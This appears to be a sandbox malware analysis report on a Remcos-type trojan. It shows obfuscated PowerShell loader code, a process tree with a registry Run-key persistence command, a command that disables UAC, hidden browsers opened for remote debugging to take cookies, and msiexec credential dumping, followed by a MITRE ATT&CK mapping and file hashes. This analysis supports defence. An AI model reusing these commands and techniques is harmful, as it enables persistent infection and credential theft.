StuUR,diNHerbIIdeobRumsa dinnAndokCore)') ;reservelgernes (Perlers ' sla$Aff G ,ffL icO Re bLetfATreplMach:FlorTCrenoMaskIDebrlC.phE polT limtIs ceInkaRPartN Fl EStatS Elu=Fors$ Ky,gAr.hLRug.oBoltBDyn,AKo.pL Ac,:SpedVSljfA EvenLexiDVenufprstOToterAfmaS ciryForsnPreliProcNUnitgSabesmazapCornLVedgaAmounAdeneEx,irAfvaNRa.iEUdto9mi j9till+G us+ vag% bac$Del,A Undf AurdSp ceFllelTromi SliNBarsGMes EWheeRHeten Irae VarSdest.O fscB.rfo ostU UnnNRu,tt') ;$Bortadoptkmr=$Afdelingernes[$Toiletternes]}$Divisionsstykkes=326774;$Hved=29566;reservelgernes (Perlers 'vand$AcnogGau lStoroMindbElevaSvmmLBina:Aff P ,krLAfski gengHorst.agif,elfOLegir eassPe emMan mFolcE O dlFinvSPreaETeg NKlasSPend Ba a=Ca.d Sax.gReinESount,uah-InglCNonmOph,tNcourTC,heeLilbnUndet na Tu,$FnatUPoronKaveI EngbGrupA horNVanwK');reservelgernes (Perlers 'Stu $ PrigImpolEarsoRennb apeaAutolLull:SalaSMawdoA.volForbeGunnnDatoe.mper emmg inai iseJde n.gersFilo Ud y= ns Delt[UndeSopsayHeelsO fitMi,eeBacom Kon.DispCSlyno ifnChefvReine Danr,kattHen ]Udd :Para:Us rFVaporFdseoUdlamChabB GnaaPte,sReche Dep6Pro.4BaskS amt B arC viiFladn ofogParr( Sen$ShapPLgeml BriiMyxogEpidtKramfJug.oSankrW atsSkammRegem,naceTranlB omsSem eSelsnLeucsB is)');reservelgernes (Perlers ' Re,$SerrG P oL ShaO Berb hypAFiellLaun:Ben.u SkrP,ricsFirstupliR NexeSydbeMelaT Amp R.ta=Medi Larr[SadlsAwinYCompsEr vTrequED alMCent.faertCoc,E UndXBandtHof,. SteEGangnUtroCU huO,iegdSquaiI ddnSprogUnde]Fenn:f ri:DetaAPolySKildCLigfI orcIbuty. SengBe.eeFi kTNedss HeaTFordRAfflISka.NPensGTred(Ki s$ kspsMo eOUnpaLAfgnEGhionAd,iEV mpRKamggAkkuI egneI.beNPoetSSnig)');reservelgernes (Perlers 'Hept$AnhigGlasLHavsOOverBSkaaaP,rpLE,tl:E.maB Geni Omro M jgK,raaTrias U,sS eade ofarAutoScond=Stak$Immiu Ri pPhytSFyratFeltRsandeNonjESpi.Tar m. CafS AnoUU.orb.mpls KeytSanirMa aiKassn UdsgSo t(Flyb$AmmoDBivaIBredvPik.IH.isshorniinbuoHomoNProlSCreusNoistsleeY afmkBelakBundE amtsHerk, F r$SluthaculV BrsE StoDJ ne)');reservelgernes $biogassers;"
1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%hydrofyt% -windowstyle 1 $Vedstaaelse=(gp -Path 'HKCU:\Software\wuhan\').Thailndere;%hydrofyt% ($Vedstaaelse)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3664
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%hydrofyt% -windowstyle 1 $Vedstaaelse=(gp -Path 'HKCU:\Software\wuhan\').Thailndere;%hydrofyt% ($Vedstaaelse)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3928
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:452
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2864
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffccf98cc40,0x7ffccf98cc4c,0x7ffccf98cc58
      4⤵
      PID:2752
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,8914903775284850191,15315559479941675066,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2
      4⤵
      PID:5072
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1996,i,8914903775284850191,15315559479941675066,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2320 /prefetch:3
      4⤵
      PID:3932
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2112,i,8914903775284850191,15315559479941675066,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2428 /prefetch:8
      4⤵
      PID:4804
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,8914903775284850191,15315559479941675066,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:984
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,8914903775284850191,15315559479941675066,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4232
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4628,i,8914903775284850191,15315559479941675066,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4624 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4404
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:2024
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffccf8446f8,0x7ffccf844708,0x7ffccf844718
      4⤵
      PID:3996
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5029870071630803862,3116439651541474893,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
      4⤵
      PID:1376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,5029870071630803862,3116439651541474893,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3
      4⤵
      PID:4940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,5029870071630803862,3116439651541474893,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
      4⤵
      PID:2900
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2088,5029870071630803862,3116439651541474893,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4732
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2088,5029870071630803862,3116439651541474893,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3124
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2088,5029870071630803862,3116439651541474893,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:748
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2088,5029870071630803862,3116439651541474893,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3652
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qlltgojnkcvtkifypasrtibui"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5024
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\agqmhgcpyknynwbkgkflevvdqais"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:1348
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kivwaznimsgdxdpoqvsmhaquzhabnqwm"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4560

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4316

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2068

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Network Service Discovery

T1046

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
09e6b5cb6dc41d41cbeb4bed9baf6272

SHA1
695ba623ed144f570547cc585289dd4657fb4b5f

SHA256
64c4605d4aa821ee0f8269242caba6709a13f131792d6171200f02f966567d49

SHA512
22f3f9a56a53b70058cf4fb0b62a9fc2d96fa3a032549399fd0fede62480003fe5b4d9d6d27ae5472d15950f97720bcda82d6f3dd7f5afbbe9bc573117c8cafd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
683deca83588ddc063713b7d5e1e9668

SHA1
cb79ea9cd89bf5caa0ec9a6b0155abc2ce73bf01

SHA256
9daa9c1b03be5fc0e99e4807840d71b2b38dd3ce7833bb645d5d43cee757c29e

SHA512
dfe0cd0759e6cd9ecb9396f180a149640c99542db9e268e5b2873022caad0ed58fdf17d3e65cffbd313ff940eb7104f582add2371f42c9c5988f2ab6a05e70b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
7fca0bb754c4fc845d1dddd0af698eb1

SHA1
615dd010cb778fa1d80926dfc7b2bb93553484ee

SHA256
92be28b2ce4d6d7855c429ff5c4ff505eecad70f80f803e45bbb913e7843cfee

SHA512
26c5d5655b0aad053046021f30e9a8483c96a65c57c90a60d00badae3e93c9eb1d959693602ce51768b999f7b6fb21a93d6b008922087a13cba5968fdc8a8a6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
3b0103ad84a82b6fb0841552c9e5e60a

SHA1
dc5bbe16ae5baab252d2f034d7daff2708c5cd7a

SHA256
c6f369372fa74460b6661cd6c84812e6d1b9f7ea3097f19f9126f2a3363f8374

SHA512
3470b842d8e50f916b2bf48dd2c72cf433058ac6060e6f77d98548069e4f8714f8d4df94ca054479bf45e5b8df02476942320bb31df329c8ca08a91d7c32dfe1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
16ea16a01bca4e2f14c8a5707c90e3da

SHA1
b59db1f151223b94293b4215ff6048fb5713cb82

SHA256
56b315131e5e6815b90f9027d1b59056e1c5afe63243f1db410ffb8dd710b3c8

SHA512
c082ca175e88636b0563b4239220390be7fe062ed60719b4ad4fb9d9eb8b816dcda38f79b12a77f205e223dd809a18bcf1918dee20d60c34ea867573734258de

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
28c82386ed19259e11c794a3a1805b89

SHA1
716053b48ec63e945b849072232003a10e1a7d3f

SHA256
b38dd2c9c3bfff07f8e5e63fbab0f592d9516871d807287c0799215e85bdc759

SHA512
203d9117a49f75ec6035c267d8381df1838488c8cee0ba647edae6a81fcb579cf6182b3cdee4d0ec4feec135df1ab89f0e76a51a66da3a4b430824a578ea0e81

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
51285e984171c9fa3568da5c7cda5a25

SHA1
a1f243fa820fd0b862c78f366be699d1e95afa97

SHA256
530dff893d0145baac727a32bd41bc4796104bcfc5b786d84d8d4bd7cc2b7877

SHA512
98397143b11decb70783343713d82adaee20261b090355efeda1d655523e9e437d44c166880f91da62ac2dee1160e34fc1b45945d060e50530166a481d43556a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Extension State\LOG

Filesize
263B

MD5
d9bfafc246c21e9f9acea1f52b20b789

SHA1
9330d295a262a6fdb962174750f2a6ea7cb9c27b

SHA256
27638978111f1a90bf1a975f3b27971f0ff9060aa534689babde243149f1e437

SHA512
d2c1b2617bbf09644fd0dcf87e8cb77cd48a54f321677c159b56d64b602d5d4d24dcb93db4fdb0d9beae1e948e5a50b7aeed9e076140ccc09ab5798f48fac2a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

Filesize
20KB

MD5
b40e1be3d7543b6678720c3aeaf3dec3

SHA1
7758593d371b07423ba7cb84f99ebe3416624f56

SHA256
2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

SHA512
fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

Filesize
256KB

MD5
2c56d5058d992eaad43e2a7e20b425f9

SHA1
1fc54a95c3d855e479bb92032339d69bd2f531ff

SHA256
fbc97b6f29a43099ba11e73b84c7c8b4cf3c212fa805f7fe10a6da2e0ca58fa4

SHA512
b0183a649497d678424ea606a3dd6703db8df1709d99a81c18a243993fb13ef086fe0d0926270b832e315d0003db522284e0ac2fc4e785694d2cfcbfd2994679

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

Filesize
192KB

MD5
d30bfa66491904286f1907f46212dd72

SHA1
9f56e96a6da2294512897ea2ea76953a70012564

SHA256
25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907

SHA512
44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

Filesize
275B

MD5
df86d1360edb485065d95c61a8259896

SHA1
800bb41af6534c5440884cd0810f5c75efd24d30

SHA256
0a311c491a7b5791f1d89e8af400b76937dab7b297e250ae5b03b66773cb778a

SHA512
e5074e9f49130d230ffd0b08e2dc6b052ebecd774f0c1aa8396eeaccbe8ada02cab119b6964092280a9552259b4f6f1be195c62c82449f2da26bf620d19e0ee9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

Filesize
1KB

MD5
60dcfe2751d770a8bb36723642d82fbf

SHA1
6d69407989d07a1da52c9270417447cc6764e317

SHA256
5d00a16d1f3f798b916f882807217defbc0766cbbade56f597340e99938e2507

SHA512
8449ec9ee0e177e0de74d2e4329c17eb9a2d47d9f9243c59c86dd8089517231d7a6b9e348ab61fa94884ebf01302863f665468d21744310f8815c03afcddd966

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

Filesize
20KB

MD5
bee760dc6550e865d33f0fc85a55f610

SHA1
9599b4b052837cf6ceb4b0f508e223e600733b25

SHA256
337b9b483f3d0b8526b204554ef229f8e3ed352d31697bcba3a32ee5bda0c3fb

SHA512
2c6c384960c5d682ee13d174e060d1ac2059a396b9f3d64e64aa67c6a96776a1c1d7d08f910a0c4b97e7b9a74391901284fb66af0e19d2ce8668ea297dd3db08

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
5KB

MD5
4d25265182cdb724aad5734f54714746

SHA1
1a9e406f94069b8cedc3dff6f886c2866f62a80c

SHA256
00b966dab684b10cbdc24bd31afb311bd1b8bac891f0e01d49996fab65185a8a

SHA512
55101e136ebf7e30aab56ecf776b100912d138c60c2b4bd5b6b790cffe6e00fad5b4c7d933862b69c0dc591221d21e2e7b202d17ce19a3ec3edc4ee693ecbe3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
1KB

MD5
5386b112fa0b22a45f72028ce295ee8b

SHA1
d3d2e5eed63f1a936bef8f91fd5cd7d428d97152

SHA256
292c54382483f19e3d6b68359299d9fb2a328d4545085dd1d0fe01fddb48eeba

SHA512
3f1fb663e1e7c04dc417f0c65db6de30acc3706f1a45c640fde8e64978db7a0229ed624f07914b6e25ced7a5a44145243036c4949a5f367e66969bf70d909819

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
24KB

MD5
fb9b644175d9cb9412afa02e5162aa36

SHA1
549e99099f845f414e650dc71c41a2165b29f64a

SHA256
ef5bacdc32263d63240194ea3cdf60c69dffb9544e0d59730d35fcf5d89fd6d8

SHA512
b021b24fac3cba795ea5165108a79853a9f2b1c3ba78359c4f251e3b1953fc6b1ab753658c2bc8d11dfcb2dd5b696d89240e8c99fd41a5146615c8553f8905f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
15KB

MD5
e2f6740589a4b570eae3bde32ad6e60e

SHA1
f480cb3fe10ff7338916edbea9ed63bd01175122

SHA256
56cf9ec20fd3892b742bf6518f974734d753e9fd5157b33199d8b82c8a09c318

SHA512
4148c0ab36f82aa31d3343eeae7c16e7c66b948aa0124efa207b76ae067b33c8b4495faa25f6f2241408bc400f45e86b3c33ec0d2c5323065b320747565ac42e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

Filesize
241B

MD5
9082ba76dad3cf4f527b8bb631ef4bb2

SHA1
4ab9c4a48c186b029d5f8ad4c3f53985499c21b0

SHA256
bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd

SHA512
621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

Filesize
279B

MD5
892a7f3c481ff1e52029c988032e62a7

SHA1
97d4a7524b738453b4aec721b4f35444dd922280

SHA256
83b184eb2e017a044b7089f581b5616a574e2d27769ff58fd2d35cb6e64f09b4

SHA512
1f90bbe0c002e8f874a2a6fe49908ae57b52b884ea73ea2b363524e3c4c1cd6710f86a1606d677a80ccaf9b7d87e032750588c2c454c3686bfec1e8e43210a51

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

Filesize
80B

MD5
69449520fd9c139c534e2970342c6bd8

SHA1
230fe369a09def748f8cc23ad70fd19ed8d1b885

SHA256
3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277

SHA512
ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

Filesize
265B

MD5
7e67b75effb0dfdf62ac415f733fb502

SHA1
4488e25545a4a5b05010a7713969512c6c16e8e0

SHA256
2a7c76c608a14f55473114829493031301e5369dd6b894092e8c8920e426d7ed

SHA512
029c6ef1e9d94af00055dddf486ca3a328f9ea71b563be43f43d104e2d7e056ba74d656da926a335229877b19322b0c25ea85c4cf4b8561e306219f00cb17fac

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

Filesize
40B

MD5
148079685e25097536785f4536af014b

SHA1
c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

SHA256
f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

SHA512
c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f
